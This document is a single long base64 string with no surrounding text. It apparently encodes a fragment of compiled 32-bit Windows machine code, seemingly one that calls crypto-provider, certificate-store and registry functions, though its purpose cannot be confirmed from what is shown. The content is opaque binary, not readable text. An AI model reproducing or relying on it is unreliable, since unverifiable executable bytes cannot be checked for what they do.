6C9W/P+DxBRT/xX0QwcQjUQkEEdQVo1EJBxQVlZX/9WFwHWaiz3kQwcQ/9c9AwEAAHQP/9dQaBATCRDo9FX8/1lZaJATCRCL7ujmVfz/WY1EJBBQVo1EJBxQVlZW62T/dCQQakD/FdhDBxCL2IXbdEONRCQQUFONRCQcUFZWVf8VzEAHEIXAdCSLTCQU6JYc/P9TUYXAubQECBAPRchRVWjcEgkQ6IpV/P+DxBRT/xX0QwcQjUQkEEVQVo1EJBxQVlZV/xXMQAcQhcB1kv/XPQMBAAB0D//XUGjIEwkQ6FFV/P9ZWTk1kJoKEHRcaFAUCRDoPVX8/1mNRCQYUI1EJBRQ/xWwmgoQhcB4LotEJBg5MHYdi0AE/zSwVmh0FAkQ6A9V/P+LRCQkg8QMRjswcuNQ/xWYmgoQ6w//11BoiBQJEOjtVPz/WVlfXl0zwFuDxAzDVYvsUVGLVQyNRfyLTQiDZfgAVmgcFQkQUGg4FQkQ6CCO/P+LTfzoYhv8/4vwVv91/GhQFQkQ6KZU/P+DxBiNRfho9h8EEFBqAFb/FXxBBxBehcB1E/8V5EMHEFBooBUJEOh7VPz/WVkzwIvlXcOLTCQU/3QkBIsRUmh0FAkQjUIBiQHoWVT8/zPAg8QMQMIUAIPsMFOLXCQ8i9NVVleLfCREM/ZWVmho5ggQi8+9AAABAOiMjfz/VlZoHBYJEIvTiUQkSIvP6HiN/P+NTUCFwIvTD0Xpi8+JbCRQM+1VVWgsFgkQ6FqN/P+JRCRYi9NoHBUJEI1EJEyLz1BoOBUJEOg+jfz/i0wkVOh/Gvz/i/CL02g4FgkQjUQkVIvPUGhAFgkQ6BuN/P//dCRcVv90JGhoUBYJEOimU/z/g8RMgc4AwAAA/3QkIFZVVWoK/xVgQQcQi9iJXCQ8hdsPhKMCAABVU4lsJBj/FYhBBxDpfQIAAIv1VVVVVf80tXDsBxBX/xWUQQcQiUQkFIXAdR7/FeRDBxBQaLgaCRDoQlP8/0ZZWYP+BXLN6TcCAAADwFBqQP8V2EMHEIvohe0PhCACAAD/dCQUM9tVU1P/NLVw7AcQV/8VlEEHEDtEJBQPheEBAACLdCQQVVZodBQJEOjvUvz/g8QMiVwkFI1EJBRQU2oCV/8VmEEHEIXAD4QuAQAA/3QkFGpA/xXYQwcQi9iF2w+EBgEAAI1EJBRQU2oCV/8VmEEHEIXAD4RuAQAAi0sI6JAZ/P+DewQAi9D/cwi4yBYJEIvwi8gPRXMEuLQECBCDOwAPRQuF0g9FwlBWUWjYFgkQ6GlS/P+DxBSDfCQ0AA+FmwAAAI1EJCxQjUQkIFCNRCQgUGoA/3QkSFf/FXRBBxCFwA+E7QAAAItMJBxR6EoZ/P9QaGQXCRDoIlL8/4PEDIN8JBz/D4SWAAAAjUQkKFD/dCQg/3QkIP8V1EAHEIXAdBeLVCQoM8noBgcAAP90JCj/FUhABxDrE/8V5EMHEFBoqBcJEOjVUfz/WVmDfCQsAHQMagD/dCQc/xUAQAcQi3QkEFP/FfRDBxCDfCQwAHUWaLT/BxDopFH8/1mDfCQwAA+EjQAAAItUJBSLz1VW/3QkKP90JDDohAoAAIPEEOtzgz2QmgoQAHQei0wkGDPS6H4GAACDfCQsAHSj/3QkGP8VxJoKEOuXaCgYCRDoTVH8/1nriv8V5EMHEFBo4BgJEOg5Ufz/Wevp/xXkQwcQUGiIGQkQ6CVR/P9ZWeli/////xXkQwcQUGgwGgkQ6A1R/P9ZWVX/FfRDBxCLXCQ8M+1XU/8ViEEHEP9EJBCL+IX/D4V5/f//agFT/xVUQQcQ6xP/FeRDBxBQaFAbCRDozFD8/1lZX15dM8Bbg8Qww4PsLFNVVovaM+2L0YlcJDBXRYlUJDAz/4XSdBaL8o1OAmaLBoPGAmY7x3X1K/HR/usCi/eLRCREDQAAAPBQ/3QkRI1EJCRTUlD/FTxABxCFwA+EOQIAAGoBjUQkKFBXagL/dCQs/xUIQAcQ/3QkJIvYakD/FdhDBxCJRCQghcAPhB4CAACJfCQUhdsPhMgBAADrBItEJCBVjUwkKFFQagL/dCQs/xUIQAcQi9iJXCQ4hdsPhJIBAACLTCQg6IeF/P+L6IXtD4R/AQAAVf90JBhozBsJEOjmT/z/i92DxAyNSwJmiwODwwJmO8d19SvZ0fuNBDONBEUCAAAAUGpA/xXYQwcQiUQkLIXAD4QvAQAAhfZ0EY0MNlH/dCQ0UOhl4wIAg8QMjQQbi1wkLFBVjQRzUOhQ4wIAg8QMjUQkGP90JET/dCRE/3QkPFNQ/xU8QAcQhcAPhNsAAABXjUQkLFBXaiT/dCQo/xUIQAcQhcB0Pf90JChqQP8V2EMHEIvYhdt0K1eNRCQsUFNqJP90JCj/FQhABxCFwHQNU2jgGwkQ6BtP/P9ZWVP/FfRDBxAz24l8JBBDjUQkEFBT/3QkIP8V1EAHEIXAdQZDg/sCduaDfCQQAHRMU4vL6P8V/P9QaGQXCRDo1078/4tUJByDxAwzyejdAwAAg3wkSAB0GItUJBAzyVX/dCQY/3QkVFPo9AUAAIPEEP90JBD/FUhABxDrE/8V5EMHEFBo8BsJEOiNTvz/WVn/dCQs/xX0QwcQVf8V9EMHEItcJDj/RCQUagJdhdsPhTr+////FeRDBxA9AwEAAHQT/xXkQwcQUGhoHAkQ6ElO/P9ZWVf/dCQg/xUAQAcQ/3QkIP8V9EMHEOsT/xXkQwcQUGjoHAkQ6B9O/P9ZWV9eXVuDxCzDg+wki1QkLItMJChTVVZXM/9XV2ho5ggQiXwkJOhWh/z/i1QkSItMJESJRCQ4jUQkMGhgFwgQUGhoHQkQ6DaH/P+LbCQ8g8QYhe10Mov3/zT1YKwHEFXod1gBAFlZhcB0f4sE9WCsBxCDwAZQVehgWAEAWVmFwHRoRoP+DHLQi9+LVCQ8jUQkKItMJDiF22g0HQgQUGh8HQkQD0Td6NaG/P+LbCQ0g8QMhe10RIv3/zT10KsHEFXoF1gBAFlZhcB0KIsE9dCrBxCDwApQVegAWAEAWVmFwHQRRoP+EnLQ6xCLHPVkrAcQ65eLPPXUqwcQhf91DVdXVejp8AEAg8QMi/iLVCQ8i0wkOGoAagBo+LMIEOhghvz/i1QkSDP2aiCFwLj4swgQWQ9F8bnA8QgQagCF9moAD0TBi0wkTGgcFgkQiUQkSOgthvz/g8QYhcB0A4POQItUJDyNRCQoi0wkOGiYHQkQUGjoHQkQ6AeG/P//dCQ0V1WLbCRIU/90JEBVaAAeCRDoi0z8/2jcHgkQ6IFM/P9V/3QkXIvTM8lWV+ix+///g8Q8gz2QmgoQAA+EawEAAGgEHwkQ6FdM/P9ZM/+NRCQcV/90JCxQ/xWcmgoQhcAPiDkBAACL3+njAAAAi0QkFP8wU2jMGwkQ6CRM/P+LRCQgg8QMVlf/MI1EJBxQ/3QkLP8VvJoKEIXAD4iYAAAAV41EJCRQV1doIB8JEP90JCT/FaSaChCFwHhH/3QkIGpA/xXYQwcQi/iF/3QzagCNRCQkUP90JChXaCAfCRD/dCQk/xWkmgoQhcB4DVdoOB8JEOirS/z/WVlX/xX0QwcQM/+LTCQQM9LoqQAAAIN8JCwAdBiLRCQUM9KLTCQQ/zBTVWoB6MACAACDxBD/dCQQ/xXEmgoQ6w1QaEgfCRDoX0v8/1lZ/3QkFP8VwJoKEENWjUQkHFCNRCQcUFf/dCQs/xWomgoQhcAPif/+//89KgAJgHQNUGiwHwkQ6CJL/P9ZWYN8JBgAdAr/dCQY/xXAmgoQ/3QkHP8VxJoKEOsNUGgYIAkQ6PhK/P9ZWV9eXTPAW4PEJMNRUVNVVovxV4v6hfZ0W2oAjUQkGFBqBI1EJBxQaJQgCRBW/xWkmgoQi2wkEDPbagCFwI1EJBhQagSNRCQcD5nDUGiwIAkQVoPlAf8VpJoKEDPJhcAPmcEj2XVo/xXkQwcQUGjAIAkQ61OF/3R7izVAQAcQjUQkFGoAUI1EJBjHRCQcBAAAAFBqBlf/1otsJBCL2GoEWGoAI+iJRCQYjUQkGFCNRCQYUGoJV//WI9h1F/8V5EMHEFBoQCEJEOgrSvz/WVmF23Qh/3QkELnIIQkQhe24wCEJEA9EwVBo0CEJEOgHSvz/g8QMX15dW1lZw1WL7IPsFFMz28dF7AMAAABWi/KJXfRXi/mJXfyJXfCJXfg5XQh0bjkdkJoKEHRfU2iYHQkQjUX0UP8VnJoKEIXAD4iOAAAAU1ZXjUX8UFNoKCIJEFP/dfT/FZSaChCFwHglU2oEjUXsUGiUIAkQ/3X8/xWgmgoQhcB5WmhIIgkQ6HhJ/P/rTWjAIgkQ6/JoOCMJEOvraAAAAPBqAVNTjUXwUP8VPEAHEIXAdCmNRfhQagFTVlf/dfD/FRBABxCFwHUT/xXkQwcQUGigIwkQ6CpJ/P9ZWYtN/ItV+IXJdQSF0nQ96Cn+//85XRh0F/91FItV+ItN/FP/dQxqAehDAAAAg8QQOV38dAn/dfz/FcSaChA5Xfh0Cf91+P8VSEAHEDld9HQJ/3X0/xXEmgoQOV3wdApT/3Xw/xUAQAcQX15bi+Vdw4PsIItEJCRTVVZXM/aJRCQgi+nHRCQYHvG1sItMJDiL+mhEuwgQ/3QkRLgYsQgQiWwkHP90JESF7Yl0JCi6QLEIEIl0JDAPRNCJdCQ0i96JdCQ46PICAACDxAyJRCQQhcAPhDgBAACF/3RWjUQkNFBWVmoHVlf/FShABxCFwA+E4QAAAItsJDSDxRhVakD/FdhDBxCL2IXbD4THAAAAjUQkNFCNQxhQVmoHVlf/FShABxCFwHV6U/8V9EMHEIvY62+F7Q+EmAAAAFaNRCQ4UFZWVmgkJAkQVlX/FayaChCLbCQ0i/iF/3VAg8UYVWpA/xXYQwcQi9iF23QuVo1EJDhQ/3QkPI1DGFBWaCQkCRBW/3QkMP8VrJoKEIv4hf90CVP/FfRDBxCL2Ff/FXRDBxCF23Qxi0QkNI10JBhqBlmJRCQsi/vzpYt8JBCL01WLz+jSKvz/WVOL8P8V9EMHEOsIi/jrBIt8JBC4TCQJEIX2uUQkCRAPRMhRaFQkCRDoNkf8/1lZhfZ0CFdohCQJEOsa/xXkQwcQUGiQJAkQ6wz/FeRDBxBQaBglCRDoCUf8/1lZX15dW4PEIMOD7BRTVVZXM9uJVCQcU2gAIAAAU1OL8WoCiXQkNP8VYEEHEItUJCyLTCQoaLglCRD/dCQ4iUQkGP90JDiJXCQk6EsBAACDxAyJRCQUvUQkCRC/TCQJEIXAdFv/dgiLVgSLyOgGKvz/i/CLzYX2D0TPUWjAJQkQ6IRG/P+LPeRDBxCDxAyF9nQRi3QkFFZohCQJEOhoRvz/6xH/11Bo8CUJEOhZRvz/i3QkHFlZVv8V9EMHEOsViz3kQwcQ/9dQaGAmCRDoN0b8/1lZOVwkHA+EnQAAAItUJCyLTCQoaPQmCRD/dCQ4/3QkOOiiAAAAi/CDxAyF9nRrjUQkGFBqAf90JCj/dCQc/xWAQQcQhcB0F4tMJBCL1ujCCfz//3QkGIvY/xVQQQcQhdu4TCQJEA9E6FVoVCQJEOjDRfz/WVmF23QIVmiEJAkQ6wj/11BoACcJEOioRfz/WVlW/xX0QwcQ6w//11BoYCYJEOiQRfz/WVlotP8HEOiERfz/WWoB/3QkFP8VVEEHEF9eXVuDxBTDUVFTVYvZi+pWi/MzyVeJTCQQjX4CZosGg8YCZjvBdfWLzSv30f4z/41RAmaLAYPBAmY7x3X1K8qLVCQg0fmNegJmiwKDwgJmO0QkEHXzK9eLfCQk0fqNRwKJRCQUZosHg8cCZjtEJBB18yt8JBTR/40EFwPBjX4PA/iNBD9QakD/FdhDBxCL8IX2dDT/dCQk/3QkJP90JCRVU2iAJwkQV1bod7P//4PEIIP4/3ULVv8V9EMHEIvw6weLzuizKfz/X4vGXl1bWVnDVYvsg+wMVlcz/4lN9DP2U41F+FBqAI1F/FBqAGoAV/8V0EAHEIXAdEb/dfhqQP8V2EMHEIvYhdt0MI1F+FBTjUX8UGoAagBX/xXQQAcQhcB0EVP/dfToCE8BAIXAWQ9EdfxZU/8V9EMHEEeF9nShW4X2dR6LNeRDBxD/1j0DAQAAdA//1lBooCcJEOgWRPz/WVmLRfxfXovlXcNTi9lWi/NXjU4CZosGg8YCZoXAdfUr8dH+jQR1DAAAAFBqQP8V2EMHEIv4hf90KosNNCgJEI1HCIkPiw04KAkQiU8EjQw2UVNQ6ITXAgCDxAxqXFhmiUR3CIvHX15bw4PsLINMJAT/jQQkUzPbUFNTagKJXCQkiVwkIIlcJBz/FZRFBxCFwA+FOgIAAI1EJAhQjUQkGFBoQCgJEP90JBD/FYRFBxCFwA+FAAIAAFZoZCgJEOhTQ/z/i3QkHFlmOR4PhNkBAABVV1ZojCgJEOg4Q/z/WVmNRCQoUI1EJChQagNqAlb/dCQk/xWkRQcQhcAPhWwBAACNRCQUx0QkFBAAAABQjUQkMFBoAwMJAP90JDD/FZxFBxCFwA+FKQEAAGicKAkQ6OJC/P9TahBajUwkNOjhefz/aLT/BxDoy0L8/4NMJCD/jUQkIIPEDFCNRCQgUFNTjUQkPFD/dCQk/xWMRQcQhcAPhdUAAACLfCQcZjkfD4S7AAAAV2i0KAkQ6IhC/P+DTCQc/41EJBxZWVCNRCQcUGoCV/90JCD/FYhFBxCFwHVa/3QkGGjUKAkQ6FhC/P9ZWYtMJBjop/3//4vohe10K4vO6DX+//+L2IXbdByLVCQYi8tqAGoAakBV6Gjx//+DxBBT/xX0QwcQM9v/dCQY/3QkFP8VoEUHEOsNUGj4KAkQ6AFC/P9ZWYvPjVECZosBg8ECZjvDdfUrytH5jTxPg8cCZjkfD4VJ////i3wkHFf/dCQU/xWgRQcQ6xVQaIApCRDrBlBo6CkJEOi4Qfz/WVlT/3QkKP8VmEUHEOsUPWkAEIB0DVBoUCoJEOiXQfz/WVmLzo1RAmaLAYPBAmY7w3X1K8rR+Y00ToPGAmY5Hg+FL/7//4t0JCBfXVb/dCQM/xWgRQcQXusNUGi4KgkQ6FNB/P9ZWf90JAT/FZBFBxDrDVBoKCsJEOg6Qfz/WVkzwFuDxCzDgeyQAAAAi5QkmAAAAI1EJAyLjCSUAAAAU1ZXM9u/ACgAAFNQaDS4CBCJXCQkiVwkIOhdevz/i5QksAAAAI1EJCCLjCSsAAAAU1BowPEIEOg/evz/i5QkvAAAAI1EJDSLjCS4AAAAU1BouPwIEOghevz/g8QkhcB0EFNT/3QkJOh95AEAg8QMi/iLNThGBxCNRCQMVf90JBxQ/9b/dCQYjUQkKFD/1o1EJDxQjUQkFFD/FTBABxC+tP8HEGoQXYXAD4iTAAAAaJwrCRDoYUD8/1OL1Y1MJEToYXf8/1boT0D8/4PEDDlcJBh0bo1EJCRTUI1UJESNTCRU6O0B/P9ZWYXAeFVorCsJEOgjQPz/U4vVjUwkVOgjd/z/VugRQPz/jUQkMFdQjVQkUI1MJGDouAH8/4PEFIXAeB9ovCsJEOjtP/z/U4vVjUwkVOjtdvz/VujbP/z/g8QMagGNRCQUUI1EJDxQ/xX0RQcQhcB4XmoBjUQkOFCNRCQ0UP8VIEYHEIXAeD2NRCQ8UP90JDT/FchABxCFwHgfaMwrCRDojz/8/1OL1Y1MJEToj3b8/1bofT/8/4PEDI1EJCxQ/xUcRgcQjUQkNFD/FSRGBxCLVCQUjUQkXFVQD7dEJBi5A4AAAFDoefP7/4PEDIXAdAto3CsJEOg5P/z/WVOL1Y1MJGDoOHb8/1boJj/8/4tUJByNRCR0ahRQD7dEJCC5BIAAAFDoOvP7/4PEFF2FwHQLaOwrCRDo+T78/1lTahRajUwkbOj3dfz/VujlPvz/i1QkGI2EJIQAAABqIFAPt0QkHLkMgAAAUOj28vv/g8QUhcB0C2j8KwkQ6LY+/P9ZU2ogWo2MJIAAAADosXX8/1bonz78/1lZX14zwFuBxJAAAADDU1aL8Y0cFjvzD4OlAQAAVVe9tAQIEIs+M9IzwDk8xcSsBxB0CECD+Fhy8esLixTFwKwHEIXSdUGNR9yD+Bp3B7qAOggQ6zKD/z91B7qoOggQ6yaNR4w9i38AAHcHuuQ6CBDrFY2HAID//7kQOwgQPf9/AAAPR8qL0Y1KCovFhckPRcFQ/3YEV2gMLAkQ6P89/P+DxBCDfggAD4QDAQAAaCgsCRDo6D38/4M+All0WYM+C3Q4gz4fdg+DPiN2GYM+S3Qpgz5ldCSLVgiNTgxqAOjIdPz/6w//dCQYi1QkGIvO6LoBAABZ6asAAACNRgxQi0YI0ehQaLjbCBDokT38/4PEDOmPAAAAaDAsCRDofz38/4tGDFmFwHQSg8AMA8ZQaFAsCRDoZz38/1lZi0YQhcB0EoPADAPGUGh8LAkQ6E49/P9ZWYtOFOg4BPz/UYXAi80PRchRaKgsCRDoMT38/4tOJIPEDFHoQgT8/1BoZBcJEOgaPfz//3YYaOAsCRDoDT38//92IP92HGgQLQkQ6P08/P+DxCBotP8HEOjwPPz/WYtGCIPGDAPwO/MPgmT+//9fXV4zwFvDVYvsUVaLdQyF9nQ8VmhQLQkQ6ME8/P+NRfyLzlCNVQzoJSH8/4PEDIXAdByLRRSLVfyLTQz/MFboCv7//1lZ/3UM/xX0QwcQM8BAXovlXcIQAFWL7FFRi1UMi00IVlcz/1dXaGjmCBDozXX8/4tVDItNCIlF/I1F+FdQaATECBDotXX8/4PEGIXAdEiLdfhW/xX4RAcQhcB0JVZoBN8IEOgzPPz/jUX8M9JQaJE3BBBXV1eLzuheIfz/g8Qc6yCNRfxQVv8V9EQHEFBWV+gu////6wtocC0JEOj6O/z/WV8zwF6L5V3DUVFTVldSi9n/FfREBxCLE4v4iXwkEIPqIHQog+oBdByD6gF0EIPqAQ+F8AAAAL5QLgkQ6xO+SC4JEOsMvkAuCRDrBb64JQkQVWhcLgkQ6J47/P+LUwiNSwwzwFCJRCQY6Jhy/P9otP8HEOiCO/z/g8QMg3wkHAAPhKAAAABoKCwJEOhqO/z/WYvPM/+NUQJmiwGDwQJmO8d19SvKi9bR+Y16AmaLAoPCAmY7RCQQdfMr141BAtH6A8KJRCQQA8BQakD/FdhDBxCL+IX/dE9W/3QkGGhsLgkQ/3QkHFfovan//4PEFIXAfi3/cwiNUwyLz+hpHvz/WYXAdAhXaHguCRDrDP8V5EMHEFBooC4JEOjdOvz/WVlX/xX0QwcQXV9eW1lZw1NVVot0JBCL2ldWM/+L6VdTVWgBAAEAiT6JfgT/FYxBBxCFwHRE/zZqQP8V2EMHEIlGBIXAdEZWUFNVaAEAAQD/FYxBBxCL+IX/dTH/FeRDBxBQaCgvCRDocDr8/1lZ/3YE/xX0QwcQ6xP/FeRDBxBQaMgvCRDoUjr8/1lZi8dfXl1bw1WL7IPsLFNWi/LHRdQNAAAAV4vZM/+NTgJmiwaDxgJmO8d19SvxiVXc0f6NVdQzycdF7GgwCRBBiX3wiU3gjQQ2iU34iUXYjUXsiUXkjUXgiUX8jUXwUGoYWYl99Il96McDgDAJEIl7BOgO////WYXAdBqLC41DCFCNVfjo+/7//1n/dfSL+P8V9EMHEIvHX15bi+Vdw1WL7FFRU4tdCFZXi30MM/aLx4l9+MHgAlBqQIl1/McDmDAJEIlzBP8V2EMHEIvIiU38hcl0M4X/dBWNVQyNUgSLAokEsUY793MFi0386+6LC41DCFCNVfjoif7//1n/dfyL8P8V9EMHEF+Lxl5bi+Vdw1WL7IPk+IHsTAEAAFNWV2oMWIlEJHgz/4mEJIgAAAAz24mEJJgAAABDagNejUQkdIl8JAyJRCRcjUQkWGowiUQkaI2EJKgAAABXUIl8JCzHhCSAAAAApDAJEIm8JIgAAACJvCSMAAAAx4QkkAAAAKwwCRDHhCSYAAAAEAAAAMeEJJwAAAD8DggQx4QkoAAAALgwCRDHhCSoAAAABAAAAMeEJKwAAADAMAkQiXQkZIlcJGzo8QwBAIPEDIl8JCiNhCTYAAAAx0QkLJAPCBCJXCQwx0QkNEAAAABqcFdQiXwkRIl8JEiJXCRM6LoMAQCDxAyJfCQY6BVx/P+JRCQohcAPhD4GAABqAltqEI2EJEwBAACJnCTcAAAAiYQk5AAAAI2EJKgAAABZiYQkRAEAAI2EJEgBAABRUImMJOQAAACJtCRIAQAA/xW8RQcQi1UMjUQkEItNCGjIMAkQUGjkMAkQ6D1x/P+LVQyNRCRQi00Ig8QMV1Bo9DAJEOgkcfz/g8QMhcAPhKUFAACLVQyNRCQUi00IV1BoBDEJEOgDcfz/g8QMhcAPhH0FAACLVCQUi8qNcQJmiwEDy2Y7x3X2/3QkECvOiZQkhAAAANH5aAwxCRCNBAmJhCSEAAAA6GA3/P9ZWYtMJBBoOBYJEOj8/fv/DQDAAABQV1dqCv8VYEEHEIvwiXQkVIX2D4QFBQAA/3QkRGg4MQkQ6CQ3/P9ZWVf/dCRIaAcACABXaAEAAQBW/xWQQQcQi9iJXCQQhdsPhLIEAABoZDEJEOjzNvz/WYtLDIPBIOgbb/z/aITLCBDo3Tb8/1mLSwyDwSjoBW/8/2i0/wcQ6Mc2/P9ZjYQk1AAAAFCNRCRQUI1EJCxQV2gBAAEAU/8VdEEHEIXAD4Q4BAAAi0sMjbwkKAEAAItBMImEJPAAAACLQTSJhCT0AAAAi3MMg8ZcpaWli0sMjbwk5AAAAItBIImEJPgAAACLQSSJhCT8AAAAi0sMi0EoiYQkAAEAAItBLImEJAQBAACLcwyDxgylpaWLdCQUVmiIMQkQ6Cs2/P+NhCQQAQAAUGoHjVQkcFnoSvv//4PEDIXAD4R+AwAAaLQxCRBoyDEJEGoCX42EJKwAAABXUOg+/P//g8QQhcAPhEsDAACNRCQUx0QkFKAAAACJRCRsjVQkaI2EJLwAAACJfCRouYwwCRDHRCRwBQAAAFCJjCS4AAAAx4QkvAAAAAEAAADo1fr//1mFwA+E5wIAAIvWjYwkxAAAAOhC+///hcAPhLoCAAD/dCQoaOAxCRDodTX8//90JDRoDDIJEOhnNfz/i0QkRIPEEIPICFD/dCQ0jUQkJP90JDT/dCQ0UP8VPEAHEIXAD4TBAgAAjUQkUFBoAQAACP90JEj/dCQo/xUEQAcQhcAPhNcBAACLNXhBBxCNRCRIUGoAaAEAAQD/dCRM/3QkLP/Wix3kQwcQhcAPhI4BAAD/dCRIakD/FdhDBxCL+Il8JBSF/w+EgwEAAI1EJEhQV2gBAAEA/3QkTP90JCz/1oXAD4Q4AQAAagZZjUQkGIv3UGoAagCNhCTwAAAAUI2EJOgAAABQagJoAQABAP90JGiNvCQwAQAA/3QkRPOliz2EQQcQ/9eFwA+E6AAAAP90JBhqQP8V2EMHEIvwhfYPhOsAAACNRCQYUFZqAI2EJPAAAABQjYQk6AAAAFBqAmgBAAEA/3QkaP90JET/14XAD4SFAAAAi1UMjUQkDItNCGoAUGj0JgkQ6Hpt/P+LVCQkg8QMhcCLzo1EJCh0L4t8JAxXUOh1+fv/hcCJRCQoukwkCRC5RCQJEA9EylFXaDgyCRDo3TP8/4PEFOtBg+wMUOjm+fv/i8i6TCQJEIXJiUwkMLhEJAkQD0TCUGhwMgkQ6K8z/P+DxBjrD//TUGjoMgkQ6J0z/P9ZWYt8JAxW/xX0QwcQ6x3/01BoiDMJEOsI/9NQaCg0CRDodzP8/1lZi3wkDP90JBT/FfRDBxDrE//TUGjANAkQ6Fgz/P9ZWYt8JAz/dCRQ/xVIQAcQ6xmLHeRDBxD/01BoWDUJEOgzM/z/i3wkFFlZagD/dCQg/xUAQAcQg3wkIAB0BIX/dDKLRCQ0g8gQUP90JDSNRCQk/3QkNP90JDRQ/xU8QAcQhcB1D//TUGjINQkQ6OYy/P9ZWYtcJBCDvCTQAAAAAHQN/7Qk0AAAAP8V9EMHEIO8JMAAAAAAdA3/tCTAAAAA/xX0QwcQg7wksAAAAAB0Df+0JLAAAAD/FfRDBxD/tCQMAQAA/xX0QwcQagD/dCQo/xUAQAcQi3QkVOso/xXkQwcQUGhYNgkQ6Gsy/P9ZWeuH/xXkQwcQUGjYNgkQ6FYy/P9ZWVP/FVBBBxDrE/8V5EMHEFBocDcJEOg6Mvz/WVlqAVb/FVRBBxDrJv8V5EMHEFBoADgJEOgcMvz/WesRaHA4CRDrBWjwOAkQ6Agy/P9Z/3QkKP8V9EMHEF9eM8Bbi+Vdw1WL7IPk+IPsQKG4mgoQudB3ChBTVVaLNXSeChAz21dWvWSYChCJXCQoagNaiWwkLIlcJCCJbCQkiVwkGIlsJByJRCQwiWwkNIlcJDiJXCQ86DI0/P9ZVrmgdQoQi/joJDT8/4vwWYX/D4S+AAAAhfYPhLYAAACLVwiLzYlUJByLVgiJVCQkumA5CRCLRxCJRCQUjUQkPFDoTDr8/1mFwHR4i0QkPI1UJBwrBbiaChADRCREUVNTiUQkQI1MJDhT/3cUjUQkKP93DFD/dwToWTL8/4PEIIXAdDJRU1NT/3YUjUQkKP93DI1UJDxQ/3YEjUwkTOgzMvz/g8QghcB0DGh4OQkQ6Osw/P/rIP8V5EMHEFBosDkJEOsM/xXkQwcQUGgYOgkQ6Mow/P9ZWV8zwF5dW4vlXcNVi+xRgz2QmgoQAHRLagBqAI1F/FD/FZyaChCFwHhE/3X8/xXEmgoQgT10ngoQ8CMAALjQOgkQUbnoOgkQD0PBuaB2ChBQaAg7CRBqBVroHTP8/4PEDOsLaBg7CRDoXDD8/1kzwIvlXcODPXCeChAGuDw8CRBRuVg8CRAPQ8G54HgKEFBocDwJEGoHWujfMvz/g8QMM8DDVYvsUVGLVQyNRfiLTQhTVmiEPAkQUGiYPAkQ6Glp/P//dfhooDwJEOj6L/z/g8QU/3X4agD/FdhABxCL8IX2dGCNRfxQVv8V4EAHELvQPAkQhcB0C/91/FPoyS/8/1lZagBW/xXcQAcQhcB0DGjwPAkQ6LAv/P/rEv8V5EMHEFBoED0JEOidL/z/WVmNRfxQVv8V4EAHEIXAdBn/dfxT6wz/FeRDBxBQaHg9CRDodS/8/1lZXjPAW4vlXcNVi+xRi1UMjUX8i00IVlcz/1dQaNSyCBDosGj8/4PEDIXAdFDoY278/4vwhfZ0UItV/IvO6MNu/P+FwHQvi1UMi00IV1dXagFoID4JEFboNAAAAItVDItNCFdXV2oCaJg+CRBW6B4AAACDxDCLBlb/UAjrC2gAPwkQ6O0u/P9ZXzPAXovlXcOD7BCDZCQEAFNVV4t8JCCL6Y1MJAyL2lH/dCQoiwdX/5CQAAAAhcAPhdUAAACLTCQMhckPhMkAAACLAY1UJBRSUf9QIIXAD4W2AAAAVjP2OXQkGA+OqAAAAIN8JBQAD4WdAAAAi0QkEI1UJCRSVlCLCP9RHIXAdX6LTCQkhcl0dosBjVQkHFJR/1AohcB1XYN8JBwBdVaLRCQsg+gAdCyD6AF0FYPoAXVD/3QkJIvTi81X6AMBAADrDv90JCSL04vNV+hCAAAAWVnrIf90JDiL0/90JDj/dCQ4/3QkMFGLzeh/BAAAg8QUiUQkFItMJCRRixH/UghGO3QkGA+MWP///15fXVuDxBDDUVNVVot0JBiL2ovpuoDYCBBXi87o1W38/4v4hf8PhIgAAABXaJQ/CRDorS38/1lZV4s99EMHEP/XiwaNTCQQUWjIPwkQVv+QlAAAAIXAdVuLTCQQhcl0U7rkPwkQ6Ixt/P+L8IX2dENWaPg/CRDoaC38/1lZVv/Xi0wkELo0uAgQ6Ght/P+L8IX2dB9WaBhACRDoRC38/1b/dCQki9OLzeh5AgAAg8QQVv/XX15dW1nDg+woVot0JDSJVCQkuoDYCBCJTCQoi85X6CBt/P+L+IX/D4RAAgAAU1doOEAJEOj3LPz/ix30QwcQWVlX/9OLBo1MJBhRaFhACRBW/5CQAAAAhcAPhQ0CAACLTCQYhckPhAECAACLAY1UJChSUf9QIIXAD4XuAQAAVTPtiWwkKDlsJCwPjtwBAACLRCQcjVQkFFJVUIsI/1EchcAPhbUBAACLTCQUhckPhKkBAACLAY1UJBhSUf9QKIXAD4WMAQAAg3wkGAEPhYEBAACLTCQUunBACRDoZGz8/4vwhfYPhGkBAABWaHxACRDoPCz8/1lZVv/Ti0QkFI1UJCBSaLBACRBQiwj/kZAAAACFwA+FOgEAAItMJCCFyQ+ELgEAAIsBjVQkJFJR/1AghcAPhRsBAAAz/zl8JCQPjg8BAACLbCQwi0QkII1UJBBSV1CLCP9RHIXAD4XkAAAAi0wkEIXJD4TYAAAAiwGNVCQYUlH/UCiFwA+FuwAAAIN8JBgBD4WwAAAAi0wkELpwQAkQ6Kxr/P+L8IX2D4SYAAAAVmjYQAkQ6IQr/P9ZWVb/04tMJBC6IEEJEOiEa/z/i/CF9nQQVmgUhAgQ6GAr/P9ZWVb/02g8QQkQ6FEr/P9Zi0wkELrkPwkQ6FVr/P+L8IX2dEVWaERBCRDoMSv8/1lZVv/Ti0wkELo0uAgQ6DFr/P+L8IX2dCFWaGxBCRDoDSv8/4tMJDyL1Vb/dCRI6EAAAACDxBBW/9OLRCQQUIsI/1EIRzt8JCQPjPn+//+LbCQoi0QkFFCLCP9RCEWJbCQoO2wkLA+MJP7//11bX16DxCjDg+wUVleLfCQki/eJVCQUM9KJTCQYjU4CZosGg8YCZjvCdfUr8dH+g/4KD4YHAQAAagVolEEJEFfon7QBAIPEDIXAD4XvAAAAagWNR/aNBHBooEEJEFDogbQBAIPEDIXAD4XRAAAAU1WNbwpqOlWJbCQY6MzzAABZWY1P9ovYjQxxK907wQ+EqgAAAIPAAo0sdfb///+LNdhDBxAr6IlEJBQD741DAlBqQP/Wi/iF/w+EgAAAAFP/dCQUV+jEvQIAg8QMjU0CUWpA/9aLHfRDBxCL8IX2dFtV/3QkGFboor0CAFZXaLBBCRDozyn8/41EJDCLzlCNVCQs6Lll/P+DxByFwHQq/3QkGItUJCD/dCQUi0wkKFdqAGgAQgkQ/3QkPOiz+v//g8QY/3QkEP/TVv/TV//TXVtfXoPEFMOD7BxTVolUJBgz9olMJBy6gNgIEItMJCyL3uh0afz/iUQkIIXAD4QtAQAAV/90JDRQ6Ac0AQCLPfRDBxCL8PfeWRv2WYPGAQ+EBAEAAItMJDC6ZEIJEFXoN2n8/4vohe0PhOoAAABocEIJEFXozDMBAF